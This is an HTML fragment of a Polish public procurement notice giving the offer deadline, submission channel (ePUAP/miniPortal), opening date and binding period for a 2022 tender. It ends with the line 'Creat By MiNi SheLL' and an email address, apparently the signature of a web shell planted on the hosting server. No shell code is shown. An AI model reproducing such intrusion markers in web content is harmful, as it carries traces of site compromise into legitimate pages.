Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. 3. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-10 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com